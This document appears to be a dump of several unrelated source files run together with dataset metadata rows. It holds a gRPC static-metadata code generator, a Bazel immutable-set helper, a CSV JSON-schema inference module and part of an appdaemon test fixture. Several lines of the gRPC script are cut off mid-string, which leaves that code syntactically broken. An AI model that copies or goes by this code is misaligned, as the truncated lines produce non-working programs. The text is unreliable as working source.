print >> H, '#define GRPC_BATCH_INDEX_OF(slice) \\'
print >> H, ' (GRPC_IS_STATIC_METADATA_STRING((slice)) ? (grpc_metadata_batch_callouts_index)GPR_CLAMP(GRPC_STATIC_METADATA_INDEX((slice)), 0, GRPC_BATCH_CALLOUTS_COUNT) : GRPC_BATCH_CALLOUTS_COUNT)'
print >> H
print >> H, 'extern const uint8_t grpc_static_accept_encoding_metadata[%d];' % (
1 << len(COMPRESSION_ALGORITHMS))
print >> C, 'const uint8_t grpc_static_accept_encoding_metadata[%d] = {' % (
1 << len(COMPRESSION_ALGORITHMS))
print >> C, '0,%s' % ','.join('%d' % md_idx(elem) for elem in compression_elems)
print >> C, '};'
print >> C
print >> H, '#define GRPC_MDELEM_ACCEPT_ENCODING_FOR_ALGORITHMS(algs) (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[grpc_static_accept_encoding_metadata[(algs)]], GRPC_MDELEM_STORAGE_STATIC))'
print >> H
print >> H, 'extern const uint8_t grpc_static_accept_stream_encoding_metadata[%d];' % (
1 << len(STREAM_COMPRESSION_ALGORITHMS))
print >> C, 'const uint8_t grpc_static_accept_stream_encoding_metadata[%d] = {' % (
1 << len(STREAM_COMPRESSION_ALGORITHMS))
print >> C, '0,%s' % ','.join(
'%d' % md_idx(elem) for elem in stream_compression_elems)
print >> C, '};'
print >> H, '#define GRPC_MDELEM_ACCEPT_STREAM_ENCODING_FOR_ALGORITHMS(algs) (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[grpc_static_accept_stream_encoding_metadata[(algs)]], GRPC_MDELEM_STORAGE_STATIC))'
print >> H, '#endif /* GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H */'
H.close()
C.close()
| 30.773554
| 204
| 0.591363
|
import hashlib
import itertools
import collections
import os
import sys
import subprocess
import re
import perfection
CONFIG = [
'host',
'grpc-timeout',
'grpc-internal-encoding-request',
'grpc-internal-stream-encoding-request',
'grpc-payload-bin',
':path',
'grpc-encoding',
'grpc-accept-encoding',
'user-agent',
':authority',
'grpc-message',
'grpc-status',
'grpc-server-stats-bin',
'grpc-tags-bin',
'grpc-trace-bin',
'grpc-previous-rpc-attempts',
'grpc-retry-pushback-ms',
'1',
'2',
'3',
'4',
'',
'grpc.wait_for_ready',
'grpc.timeout',
'grpc.max_request_message_bytes',
'grpc.max_response_message_bytes',
'/grpc.lb.v1.LoadBalancer/BalanceLoad',
'deflate',
'gzip',
'stream/gzip',
(':authority', ''),
(':method', 'GET'),
(':method', 'POST'),
(':path', '/'),
(':path', '/index.html'),
(':scheme', 'http'),
(':scheme', 'https'),
(':status', '200'),
(':status', '204'),
(':status', '206'),
(':status', '304'),
(':status', '400'),
(':status', '404'),
(':status', '500'),
('accept-charset', ''),
('accept-encoding', 'gzip, deflate'),
('accept-language', ''),
('accept-ranges', ''),
('accept', ''),
('access-control-allow-origin', ''),
('age', ''),
('allow', ''),
('authorization', ''),
('cache-control', ''),
('content-disposition', ''),
('content-encoding', ''),
('content-language', ''),
('content-length', ''),
('content-location', ''),
('content-range', ''),
('content-type', ''),
('cookie', ''),
('date', ''),
('etag', ''),
('expect', ''),
('expires', ''),
('from', ''),
('host', ''),
('if-match', ''),
('if-modified-since', ''),
('if-none-match', ''),
('if-range', ''),
('if-unmodified-since', ''),
('last-modified', ''),
('link', ''),
('location', ''),
('max-forwards', ''),
('proxy-authenticate', ''),
('proxy-authorization', ''),
('range', ''),
('referer', ''),
('refresh', ''),
('retry-after', ''),
('server', ''),
('set-cookie', ''),
('strict-transport-security', ''),
('transfer-encoding', ''),
('user-agent', ''),
('vary', ''),
('via', ''),
('www-authenticate', ''),
('grpc-status', '0'),
('grpc-status', '1'),
('grpc-status', '2'),
('grpc-encoding', 'identity'),
('grpc-encoding', 'gzip'),
('grpc-encoding', 'deflate'),
('te', 'trailers'),
('content-type', 'application/grpc'),
(':scheme', 'grpc'),
(':method', 'PUT'),
('accept-encoding', ''),
('content-encoding', 'identity'),
('content-encoding', 'gzip'),
('lb-token', ''),
('lb-cost-bin', ''),
]
METADATA_BATCH_CALLOUTS = [
(':path'),
(':method'),
(':status'),
(':authority'),
(':scheme'),
('te'),
('grpc-message'),
('grpc-status'),
('grpc-payload-bin'),
('grpc-encoding'),
('grpc-accept-encoding'),
('grpc-server-stats-bin'),
('grpc-tags-bin'),
('grpc-trace-bin'),
('content-type'),
('content-encoding'),
('accept-encoding'),
('grpc-internal-encoding-request'),
('grpc-internal-stream-encoding-request'),
('user-agent'),
('host'),
('lb-token'),
('grpc-previous-rpc-attempts'),
('grpc-retry-pushback-ms'),
]
COMPRESSION_ALGORITHMS = [
'identity',
'deflate',
'gzip',
]
STREAM_COMPRESSION_ALGORITHMS = [
'identity',
'gzip',
]
def mangle(elem, name=None):
xl = {
'-': '_',
':': '',
'/': 'slash',
'.': 'dot',
',': 'comma',
' ': '_',
}
def m0(x):
if not x:
return 'empty'
r = ''
for c in x:
put = xl.get(c, c.lower())
if not put:
continue
last_is_underscore = r[-1] == '_' if r else True
if last_is_underscore and put == '_':
continue
elif len(put) > 1:
if not last_is_underscore:
r += '_'
r += put
r += '_'
else:
r += put
if r[-1] == '_':
r = r[:-1]
return r
def n(default, name=name):
if name is None:
return 'grpc_%s_' % default
if name == '':
return ''
return 'grpc_%s_' % name
if isinstance(elem, tuple):
return '%s%s_%s' % (n('mdelem'), m0(elem[0]), m0(elem[1]))
else:
return '%s%s' % (n('mdstr'), m0(elem))
def fake_hash(elem):
return hashlib.md5(elem).hexdigest()[0:8]
def put_banner(files, banner):
for f in files:
print >> f, '/*'
for line in banner:
print >> f, ' * %s' % line
print >> f, ' */'
print >> f
all_strs = list()
all_elems = list()
static_userdata = {}
for elem in METADATA_BATCH_CALLOUTS:
if elem not in all_strs:
all_strs.append(elem)
for elem in CONFIG:
if isinstance(elem, tuple):
if elem[0] not in all_strs:
all_strs.append(elem[0])
if elem[1] not in all_strs:
all_strs.append(elem[1])
if elem not in all_elems:
all_elems.append(elem)
else:
if elem not in all_strs:
all_strs.append(elem)
compression_elems = []
for mask in range(1, 1 << len(COMPRESSION_ALGORITHMS)):
val = ','.join(COMPRESSION_ALGORITHMS[alg]
for alg in range(0, len(COMPRESSION_ALGORITHMS))
if (1 << alg) & mask)
elem = ('grpc-accept-encoding', val)
if val not in all_strs:
all_strs.append(val)
if elem not in all_elems:
all_elems.append(elem)
compression_elems.append(elem)
static_userdata[elem] = 1 + (mask | 1)
stream_compression_elems = []
for mask in range(1, 1 << len(STREAM_COMPRESSION_ALGORITHMS)):
val = ','.join(STREAM_COMPRESSION_ALGORITHMS[alg]
for alg in range(0, len(STREAM_COMPRESSION_ALGORITHMS))
if (1 << alg) & mask)
elem = ('accept-encoding', val)
if val not in all_strs:
all_strs.append(val)
if elem not in all_elems:
all_elems.append(elem)
stream_compression_elems.append(elem)
static_userdata[elem] = 1 + (mask | 1)
args = sys.argv[1:]
H = None
C = None
D = None
if args:
if 'header' in args:
H = sys.stdout
else:
H = open('/dev/null', 'w')
if 'source' in args:
C = sys.stdout
else:
C = open('/dev/null', 'w')
if 'dictionary' in args:
D = sys.stdout
else:
D = open('/dev/null', 'w')
else:
H = open(
os.path.join(
os.path.dirname(sys.argv[0]),
'../../../src/core/lib/transport/static_metadata.h'), 'w')
C = open(
os.path.join(
os.path.dirname(sys.argv[0]),
'../../../src/core/lib/transport/static_metadata.cc'), 'w')
D = open(
os.path.join(
os.path.dirname(sys.argv[0]),
'../../../test/core/end2end/fuzzers/hpack.dictionary'), 'w')
with open(sys.argv[0]) as my_source:
copyright = []
for line in my_source:
if line[0] != '#':
break
for line in my_source:
if line[0] == '#':
copyright.append(line)
break
for line in my_source:
if line[0] != '#':
break
copyright.append(line)
put_banner([H, C], [line[2:].rstrip() for line in copyright])
hex_bytes = [ord(c) for c in 'abcdefABCDEF0123456789']
def esc_dict(line):
out = "\""
for c in line:
if 32 <= c < 127:
if c != ord('"'):
out += chr(c)
else:
out += "\\\""
else:
out += '\\x%02X' % c
return out + "\""
put_banner([H, C], """WARNING: Auto-generated code.
To make changes to this file, change
tools/codegen/core/gen_static_metadata.py, and then re-run it.
See metadata.h for an explanation of the interface here, and metadata.cc for
an explanation of what's going on.
""".splitlines())
print >> H, '
print >> H, '
print >> H
print >> H, '
print >> H
print >> H, '
print >> H
print >> C, '
print >> C
print >> C, '
print >> C
print >> C, '
print >> C
str_ofs = 0
id2strofs = {}
for i, elem in enumerate(all_strs):
id2strofs[i] = str_ofs
str_ofs += len(elem)
def slice_def(i):
return ('{&grpc_static_metadata_refcounts[%d],'
' {{g_bytes+%d, %d}}}') % (i, id2strofs[i], len(all_strs[i]))
# validate configuration
for elem in METADATA_BATCH_CALLOUTS:
assert elem in all_strs
print >> H, '
print >> H, ('extern const grpc_slice '
'grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT];')
for i, elem in enumerate(all_strs):
print >> H, '/* "%s" */' % elem
print >> H, '
mangle(elem).upper(), i)
print >> H
print >> C, 'static uint8_t g_bytes[] = {%s};' % (','.join(
'%d' % ord(c) for c in ''.join(all_strs)))
print >> C
print >> C, 'static void static_ref(void *unused) {}'
print >> C, 'static void static_unref(void *unused) {}'
print >> C, ('static const grpc_slice_refcount_vtable static_sub_vtable = '
'{static_ref, static_unref, grpc_slice_default_eq_impl, '
'grpc_slice_default_hash_impl};')
print >> H, ('extern const grpc_slice_refcount_vtable '
'grpc_static_metadata_vtable;')
print >> C, ('const grpc_slice_refcount_vtable grpc_static_metadata_vtable = '
'{static_ref, static_unref, grpc_static_slice_eq, '
'grpc_static_slice_hash};')
print >> C, ('static grpc_slice_refcount static_sub_refcnt = '
'{&static_sub_vtable, &static_sub_refcnt};')
print >> H, ('extern grpc_slice_refcount '
'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT];')
print >> C, ('grpc_slice_refcount '
'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT] = {')
for i, elem in enumerate(all_strs):
print >> C, ' {&grpc_static_metadata_vtable, &static_sub_refcnt},'
print >> C, '};'
print >> C
print >> H, '
print >> H, (' ((slice).refcount != NULL && (slice).refcount->vtable == '
'&grpc_static_metadata_vtable)')
print >> H
print >> C, ('const grpc_slice grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT]'
' = {')
for i, elem in enumerate(all_strs):
print >> C, slice_def(i) + ','
print >> C, '};'
print >> C
print >> H, '
print >> H, (' ((int)((static_slice).refcount - '
'grpc_static_metadata_refcounts))')
print >> H
print >> D, '
for i, elem in enumerate(all_strs):
print >> D, '%s' % (esc_dict([len(elem)] + [ord(c) for c in elem]))
for i, elem in enumerate(all_elems):
print >> D, '%s' % (esc_dict([0, len(elem[0])] + [ord(c) for c in elem[0]] +
[len(elem[1])] + [ord(c) for c in elem[1]]))
print >> H, '
print >> H, ('extern grpc_mdelem_data '
'grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT];')
print >> H, ('extern uintptr_t '
'grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT];')
for i, elem in enumerate(all_elems):
print >> H, '/* "%s": "%s" */' % elem
print >> H, ('
'GRPC_MDELEM_STORAGE_STATIC))') % (mangle(elem).upper(), i)
print >> H
print >> C, ('uintptr_t grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT] '
'= {')
print >> C, ' %s' % ','.join(
'%d' % static_userdata.get(elem, 0) for elem in all_elems)
print >> C, '};'
print >> C
def str_idx(s):
for i, s2 in enumerate(all_strs):
if s == s2:
return i
def md_idx(m):
for i, m2 in enumerate(all_elems):
if m == m2:
return i
def offset_trials(mink):
yield 0
for i in range(1, 100):
for mul in [-1, 1]:
yield mul * i
def perfect_hash(keys, name):
p = perfection.hash_parameters(keys)
def f(i, p=p):
i += p.offset
x = i % p.t
y = i / p.t
return x + p.r[y]
return {
'PHASHRANGE': p.t - 1 + max(p.r),
'PHASHNKEYS': len(p.slots),
'pyfunc': f,
'code': """
static const int8_t %(name)s_r[] = {%(r)s};
static uint32_t %(name)s_phash(uint32_t i) {
i %(offset_sign)s= %(offset)d;
uint32_t x = i %% %(t)d;
uint32_t y = i / %(t)d;
uint32_t h = x;
if (y < GPR_ARRAY_SIZE(%(name)s_r)) {
uint32_t delta = (uint32_t)%(name)s_r[y];
h += delta;
}
return h;
}
""" % {
'name': name,
'r': ','.join('%d' % (r if r is not None else 0) for r in p.r),
't': p.t,
'offset': abs(p.offset),
'offset_sign': '+' if p.offset > 0 else '-'
}
}
elem_keys = [
str_idx(elem[0]) * len(all_strs) + str_idx(elem[1]) for elem in all_elems
]
elem_hash = perfect_hash(elem_keys, 'elems')
print >> C, elem_hash['code']
keys = [0] * int(elem_hash['PHASHRANGE'])
idxs = [255] * int(elem_hash['PHASHNKEYS'])
for i, k in enumerate(elem_keys):
h = elem_hash['pyfunc'](k)
assert keys[h] == 0
keys[h] = k
idxs[h] = i
print >> C, 'static const uint16_t elem_keys[] = {%s};' % ','.join(
'%d' % k for k in keys)
print >> C, 'static const uint8_t elem_idxs[] = {%s};' % ','.join(
'%d' % i for i in idxs)
print >> C
print >> H, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b);'
print >> C, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b) {'
print >> C, ' if (a == -1 || b == -1) return GRPC_MDNULL;'
print >> C, ' uint32_t k = (uint32_t)(a * %d + b);' % len(all_strs)
print >> C, ' uint32_t h = elems_phash(k);'
print >> C, ' return h < GPR_ARRAY_SIZE(elem_keys) && elem_keys[h] == k && elem_idxs[h] != 255 ? GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[elem_idxs[h]], GRPC_MDELEM_STORAGE_STATIC) : GRPC_MDNULL;'
print >> C, '}'
print >> C
print >> C, 'grpc_mdelem_data grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT] = {'
for a, b in all_elems:
print >> C, '{%s,%s},' % (slice_def(str_idx(a)), slice_def(str_idx(b)))
print >> C, '};'
print >> H, 'typedef enum {'
for elem in METADATA_BATCH_CALLOUTS:
print >> H, ' %s,' % mangle(elem, 'batch').upper()
print >> H, ' GRPC_BATCH_CALLOUTS_COUNT'
print >> H, '} grpc_metadata_batch_callouts_index;'
print >> H
print >> H, 'typedef union {'
print >> H, ' struct grpc_linked_mdelem *array[GRPC_BATCH_CALLOUTS_COUNT];'
print >> H, ' struct {'
for elem in METADATA_BATCH_CALLOUTS:
print >> H, ' struct grpc_linked_mdelem *%s;' % mangle(elem, '').lower()
print >> H, ' } named;'
print >> H, '} grpc_metadata_batch_callouts;'
print >> H
print >> H, '
print >> H, ' (GRPC_IS_STATIC_METADATA_STRING((slice)) ? (grpc_metadata_batch_callouts_index)GPR_CLAMP(GRPC_STATIC_METADATA_INDEX((slice)), 0, GRPC_BATCH_CALLOUTS_COUNT) : GRPC_BATCH_CALLOUTS_COUNT)'
print >> H
print >> H, 'extern const uint8_t grpc_static_accept_encoding_metadata[%d];' % (
1 << len(COMPRESSION_ALGORITHMS))
print >> C, 'const uint8_t grpc_static_accept_encoding_metadata[%d] = {' % (
1 << len(COMPRESSION_ALGORITHMS))
print >> C, '0,%s' % ','.join('%d' % md_idx(elem) for elem in compression_elems)
print >> C, '};'
print >> C
print >> H, '
print >> H
print >> H, 'extern const uint8_t grpc_static_accept_stream_encoding_metadata[%d];' % (
1 << len(STREAM_COMPRESSION_ALGORITHMS))
print >> C, 'const uint8_t grpc_static_accept_stream_encoding_metadata[%d] = {' % (
1 << len(STREAM_COMPRESSION_ALGORITHMS))
print >> C, '0,%s' % ','.join(
'%d' % md_idx(elem) for elem in stream_compression_elems)
print >> C, '};'
print >> H, '
print >> H, '
H.close()
C.close()
| true
| true
|
f705aa0a9cc3013d4d6d764c543ef84eb33c842d
| 266
|
py
|
Python
|
bulbea/__init__.py
|
saimohithnaag/StockPredictor
|
4caba8f042f1d87ec0b41ec8e14d3a458a7409a4
|
[
"Apache-2.0"
] | 1,761
|
2017-03-09T08:51:28.000Z
|
2022-03-27T18:15:06.000Z
|
bulbea/__init__.py
|
saimohithnaag/StockPredictor
|
4caba8f042f1d87ec0b41ec8e14d3a458a7409a4
|
[
"Apache-2.0"
] | 38
|
2017-03-11T11:51:16.000Z
|
2021-06-27T15:00:07.000Z
|
bulbea/__init__.py
|
saimohithnaag/StockPredictor
|
4caba8f042f1d87ec0b41ec8e14d3a458a7409a4
|
[
"Apache-2.0"
] | 511
|
2017-03-12T03:49:26.000Z
|
2022-03-15T23:05:49.000Z
|
# imports - compatibility packages
from __future__ import absolute_import
# module imports
from bulbea.entity import Share, Stock
from bulbea.config import AppConfig
from bulbea.app import app
from bulbea.learn import sentiment
__version__ = AppConfig.VERSION
| 24.181818
| 38
| 0.819549
|
from __future__ import absolute_import
from bulbea.entity import Share, Stock
from bulbea.config import AppConfig
from bulbea.app import app
from bulbea.learn import sentiment
__version__ = AppConfig.VERSION
| true
| true
|
f705aa3f869f15ac85f262ae3734bf3603f18c56
| 2,656
|
bzl
|
Python
|
haskell/set.bzl
|
iphydf/rules_haskell
|
546c698cb782fd0749a3c91eb41e1f9a19c65646
|
[
"Apache-2.0"
] | null | null | null |
haskell/set.bzl
|
iphydf/rules_haskell
|
546c698cb782fd0749a3c91eb41e1f9a19c65646
|
[
"Apache-2.0"
] | null | null | null |
haskell/set.bzl
|
iphydf/rules_haskell
|
546c698cb782fd0749a3c91eb41e1f9a19c65646
|
[
"Apache-2.0"
] | null | null | null |
"""Immutable sets that support efficient merging, traversal, and membership
check.
"""
def _empty():
"""Create an empty set.
Returns:
set, new empty set.
"""
return struct(_set_items = dict())
def _is_member(s, e):
"""Return true if `e` is in the set `s`.
Args:
s: The set to inspect.
e: The element to search for.
Result:
Bool, true if `e` is in `s`, false otherwise.
"""
return e in s._set_items
def _insert(s, e):
"""Insert an element into the set.
Args:
s: Set to insert new element into.
e: The element to insert.
Result:
A copy of set `s` with `s` element added.
"""
r = dict(s._set_items)
r[e] = None
return struct(_set_items = r)
def _mutable_insert(s, e):
"""The same as `set.insert`, but modifies the first argument in place.
Args:
s: Set to insert new element into.
e: The element to insert.
Result:
set `s` with `s` element added.
"""
s._set_items[e] = None
return s
def _union(s0, s1):
"""Return union of two sets.
Args:
s0: One set.
s1: Another set.
Result:
set, union of the two sets.
"""
r = dict(s0._set_items)
r.update(s1._set_items)
return struct(_set_items = r)
def _mutable_union(s0, s1):
"""Modify set `s0` adding elements from `s1` to it.
Args:
s0: One set.
s1: Another set.
Result:
set, union of the two sets.
"""
s0._set_items.update(s1._set_items)
return s0
def _map(s, f):
"""Map elements of given set using a function.
Args:
s: Original set.
f: Function to apply to elements of the set.
Result:
set with elements obtained by application of function `f` to the
elements of `s`.
"""
return struct(_set_items = { f(x): None for x in s._set_items.keys()})
def _from_list(l):
"""Create a set containing elements from given list.
Args:
l: List, source of the elements for the new set.
Result:
set containing elements from given list.
"""
return (struct(_set_items = { x: None for x in l }))
def _to_list(s):
"""Convert set into a list of its elements.
Args:
s: Set to convert.
Returns:
List of elements of the set.
"""
return s._set_items.keys()
def _to_depset(s):
"""Similar to `set.to_list`, but produces a depset.
Args:
s: Set to convert.
Returns:
Depset of elements from the set.
"""
return depset(_to_list(s))
set = struct(
empty = _empty,
is_member = _is_member,
insert = _insert,
mutable_insert = _mutable_insert,
union = _union,
mutable_union = _mutable_union,
map = _map,
from_list = _from_list,
to_list = _to_list,
to_depset = _to_depset,
)
| 19.386861
| 75
| 0.636672
|
def _empty():
return struct(_set_items = dict())
def _is_member(s, e):
return e in s._set_items
def _insert(s, e):
r = dict(s._set_items)
r[e] = None
return struct(_set_items = r)
def _mutable_insert(s, e):
s._set_items[e] = None
return s
def _union(s0, s1):
r = dict(s0._set_items)
r.update(s1._set_items)
return struct(_set_items = r)
def _mutable_union(s0, s1):
s0._set_items.update(s1._set_items)
return s0
def _map(s, f):
return struct(_set_items = { f(x): None for x in s._set_items.keys()})
def _from_list(l):
return (struct(_set_items = { x: None for x in l }))
def _to_list(s):
return s._set_items.keys()
def _to_depset(s):
return depset(_to_list(s))
set = struct(
empty = _empty,
is_member = _is_member,
insert = _insert,
mutable_insert = _mutable_insert,
union = _union,
mutable_union = _mutable_union,
map = _map,
from_list = _from_list,
to_list = _to_list,
to_depset = _to_depset,
)
| true
| true
|
f705aa53c6355389b32f15c7666bdf8d321b755f
| 5,052
|
py
|
Python
|
singer_encodings/json_schema.py
|
INGCRENGIFO/singer-encodings
|
eec3d7276bbc209b3e0d3c5e2a46c223d69e45b1
|
[
"Apache-2.0"
] | null | null | null |
singer_encodings/json_schema.py
|
INGCRENGIFO/singer-encodings
|
eec3d7276bbc209b3e0d3c5e2a46c223d69e45b1
|
[
"Apache-2.0"
] | null | null | null |
singer_encodings/json_schema.py
|
INGCRENGIFO/singer-encodings
|
eec3d7276bbc209b3e0d3c5e2a46c223d69e45b1
|
[
"Apache-2.0"
] | 1
|
2021-05-25T14:00:25.000Z
|
2021-05-25T14:00:25.000Z
|
import re
from . import csv
SDC_SOURCE_FILE_COLUMN = "_sdc_source_file"
SDC_SOURCE_LINENO_COLUMN = "_sdc_source_lineno"
# TODO: Add additional logging
# TODO: conn needs get_files and get_file_handle functions
def get_schema_for_table(conn, table_spec):
files = conn.get_files(table_spec['search_prefix'], table_spec['search_pattern'])
if not files:
return {}
samples = sample_files(conn, table_spec, files)
data_schema = {
**generate_schema(samples, table_spec),
SDC_SOURCE_FILE_COLUMN: {'type': 'string'},
SDC_SOURCE_LINENO_COLUMN: {'type': 'integer'},
csv.SDC_EXTRA_COLUMN: {'type': 'array', 'items': {'type': 'string'}},
}
return {
'type': 'object',
'properties': data_schema,
}
def sample_file(conn, table_spec, f, sample_rate, max_records):
table_name = table_spec['table_name']
plurality = "s" if sample_rate != 1 else ""
samples = []
file_handle = conn.get_file_handle(f)
# Add file_name to opts and flag infer_compression to support gzipped files
opts = {'key_properties': table_spec['key_properties'],
'delimiter': table_spec['delimiter'],
'encoding': table_spec.get('encoding', 'utf-8'),
'file_name': f['filepath']}
readers = csv.get_row_iterators(file_handle, options=opts, infer_compression=True)
for reader in readers:
current_row = 0
for row in reader:
if (current_row % sample_rate) == 0:
if row.get(csv.SDC_EXTRA_COLUMN):
row.pop(csv.SDC_EXTRA_COLUMN)
samples.append(row)
current_row += 1
if len(samples) >= max_records:
break
# Empty sample to show field selection, if needed
empty_file = False
if len(samples) == 0:
empty_file = True
# Assumes all reader objects in readers have the same fieldnames
samples.append({name: None for name in reader.fieldnames})
return (empty_file, samples)
# pylint: disable=too-many-arguments
def sample_files(conn, table_spec, files,
sample_rate=1, max_records=1000, max_files=5):
to_return = []
empty_samples = []
files_so_far = 0
sorted_files = sorted(files, key=lambda f: f['last_modified'], reverse=True)
for f in sorted_files:
empty_file, samples = sample_file(conn, table_spec, f,
sample_rate, max_records)
if empty_file:
empty_samples += samples
else:
to_return += samples
files_so_far += 1
if files_so_far >= max_files:
break
if not any(to_return):
return empty_samples
return to_return
def infer(datum):
"""
Returns the inferred data type
"""
if datum is None or datum == '':
return None
try:
int(datum)
return 'integer'
except (ValueError, TypeError):
pass
try:
#numbers are NOT floats, they are DECIMALS
float(datum)
return 'number'
except (ValueError, TypeError):
pass
return 'string'
def count_sample(sample, counts, table_spec):
for key, value in sample.items():
if key not in counts:
counts[key] = {}
date_overrides = table_spec.get('date_overrides', [])
if key in date_overrides:
datatype = "date-time"
else:
datatype = infer(value)
if datatype is not None:
counts[key][datatype] = counts[key].get(datatype, 0) + 1
return counts
def pick_datatype(counts):
"""
If the underlying records are ONLY of type `integer`, `number`,
or `date-time`, then return that datatype.
If the underlying records are of type `integer` and `number` only,
return `number`.
Otherwise return `string`.
"""
to_return = 'string'
if counts.get('date-time', 0) > 0:
return 'date-time'
if len(counts) == 1:
if counts.get('integer', 0) > 0:
to_return = 'integer'
elif counts.get('number', 0) > 0:
to_return = 'number'
elif(len(counts) == 2 and
counts.get('integer', 0) > 0 and
counts.get('number', 0) > 0):
to_return = 'number'
return to_return
def generate_schema(samples, table_spec):
counts = {}
for sample in samples:
# {'name' : { 'string' : 45}}
counts = count_sample(sample, counts, table_spec)
for key, value in counts.items():
datatype = pick_datatype(value)
if datatype == 'date-time':
counts[key] = {
'anyOf': [
{'type': ['null', 'string'], 'format': 'date-time'},
{'type': ['null', 'string']}
]
}
else:
types = ['null', datatype]
if datatype != 'string':
types.append('string')
counts[key] = {
'type': types,
}
return counts
| 26.87234
| 86
| 0.578583
|
import re
from . import csv
SDC_SOURCE_FILE_COLUMN = "_sdc_source_file"
SDC_SOURCE_LINENO_COLUMN = "_sdc_source_lineno"
def get_schema_for_table(conn, table_spec):
files = conn.get_files(table_spec['search_prefix'], table_spec['search_pattern'])
if not files:
return {}
samples = sample_files(conn, table_spec, files)
data_schema = {
**generate_schema(samples, table_spec),
SDC_SOURCE_FILE_COLUMN: {'type': 'string'},
SDC_SOURCE_LINENO_COLUMN: {'type': 'integer'},
csv.SDC_EXTRA_COLUMN: {'type': 'array', 'items': {'type': 'string'}},
}
return {
'type': 'object',
'properties': data_schema,
}
def sample_file(conn, table_spec, f, sample_rate, max_records):
table_name = table_spec['table_name']
plurality = "s" if sample_rate != 1 else ""
samples = []
file_handle = conn.get_file_handle(f)
opts = {'key_properties': table_spec['key_properties'],
'delimiter': table_spec['delimiter'],
'encoding': table_spec.get('encoding', 'utf-8'),
'file_name': f['filepath']}
readers = csv.get_row_iterators(file_handle, options=opts, infer_compression=True)
for reader in readers:
current_row = 0
for row in reader:
if (current_row % sample_rate) == 0:
if row.get(csv.SDC_EXTRA_COLUMN):
row.pop(csv.SDC_EXTRA_COLUMN)
samples.append(row)
current_row += 1
if len(samples) >= max_records:
break
empty_file = False
if len(samples) == 0:
empty_file = True
samples.append({name: None for name in reader.fieldnames})
return (empty_file, samples)
def sample_files(conn, table_spec, files,
sample_rate=1, max_records=1000, max_files=5):
to_return = []
empty_samples = []
files_so_far = 0
sorted_files = sorted(files, key=lambda f: f['last_modified'], reverse=True)
for f in sorted_files:
empty_file, samples = sample_file(conn, table_spec, f,
sample_rate, max_records)
if empty_file:
empty_samples += samples
else:
to_return += samples
files_so_far += 1
if files_so_far >= max_files:
break
if not any(to_return):
return empty_samples
return to_return
def infer(datum):
if datum is None or datum == '':
return None
try:
int(datum)
return 'integer'
except (ValueError, TypeError):
pass
try:
float(datum)
return 'number'
except (ValueError, TypeError):
pass
return 'string'
def count_sample(sample, counts, table_spec):
for key, value in sample.items():
if key not in counts:
counts[key] = {}
date_overrides = table_spec.get('date_overrides', [])
if key in date_overrides:
datatype = "date-time"
else:
datatype = infer(value)
if datatype is not None:
counts[key][datatype] = counts[key].get(datatype, 0) + 1
return counts
def pick_datatype(counts):
to_return = 'string'
if counts.get('date-time', 0) > 0:
return 'date-time'
if len(counts) == 1:
if counts.get('integer', 0) > 0:
to_return = 'integer'
elif counts.get('number', 0) > 0:
to_return = 'number'
elif(len(counts) == 2 and
counts.get('integer', 0) > 0 and
counts.get('number', 0) > 0):
to_return = 'number'
return to_return
def generate_schema(samples, table_spec):
counts = {}
for sample in samples:
counts = count_sample(sample, counts, table_spec)
for key, value in counts.items():
datatype = pick_datatype(value)
if datatype == 'date-time':
counts[key] = {
'anyOf': [
{'type': ['null', 'string'], 'format': 'date-time'},
{'type': ['null', 'string']}
]
}
else:
types = ['null', datatype]
if datatype != 'string':
types.append('string')
counts[key] = {
'type': types,
}
return counts
| true
| true
|
f705aa7a111c288e8e1467878b55832e0ecc8a3a
| 6,992
|
py
|
Python
|
appdaemontestframework/automation_fixture.py
|
fhoekstra/Appdaemon-Test-Framework
|
f4b3ed1145c83228cfe4e7cbc3e351b4ac975f86
|
[
"MIT"
] | 37
|
2018-08-08T10:48:13.000Z
|
2022-03-09T22:31:11.000Z
|
appdaemontestframework/automation_fixture.py
|
fhoekstra/Appdaemon-Test-Framework
|
f4b3ed1145c83228cfe4e7cbc3e351b4ac975f86
|
[
"MIT"
] | 58
|
2018-10-05T13:36:57.000Z
|
2022-02-06T11:37:20.000Z
|
appdaemontestframework/automation_fixture.py
|
fhoekstra/Appdaemon-Test-Framework
|
f4b3ed1145c83228cfe4e7cbc3e351b4ac975f86
|
[
"MIT"
] | 13
|
2018-12-04T19:22:23.000Z
|
2022-02-06T10:32:04.000Z
|
import warnings
from inspect import isfunction, signature
import pkg_resources
import pytest
from appdaemon.plugins.hass.hassapi import Hass
from appdaemontestframework.common import AppdaemonTestFrameworkError
class AutomationFixtureError(AppdaemonTestFrameworkError):
pass
def _instantiate_and_initialize_automation(function, automation_class, given_that, hass_functions, hass_mocks):
_inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks)
automation = automation_class(
None,
automation_class.__name__,
None,
None,
None,
None,
None
)
automation.initialize()
given_that.mock_functions_are_cleared()
return automation
def _inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks):
injectable_fixtures = {
'given_that': given_that,
'hass_functions': hass_functions,
'hass_mocks': hass_mocks,
}
def _check_valid(param):
if param not in injectable_fixtures:
raise AutomationFixtureError(
f"'{param}' is not a valid fixture! | The only fixtures injectable in '@automation_fixture' are: {list(injectable_fixtures.keys())}")
if param == 'hass_functions':
warnings.warn(
"""
Injecting `hass_functions` into automation fixtures is deprecated.
Replace `hass_functions` with `hass_mocks` injections and access hass_functions with `hass_mocks.hass_functions`
""",
DeprecationWarning)
args = []
for param in signature(function).parameters:
_check_valid(param)
args.append(injectable_fixtures.get(param))
function(*tuple(args))
def ensure_automation_is_valid(automation_class):
def function_exist_in_automation_class(func_name):
return func_name in dir(automation_class)
def function_has_arguments_other_than_self(func_name):
func_parameters = signature(getattr(automation_class, func_name)).parameters
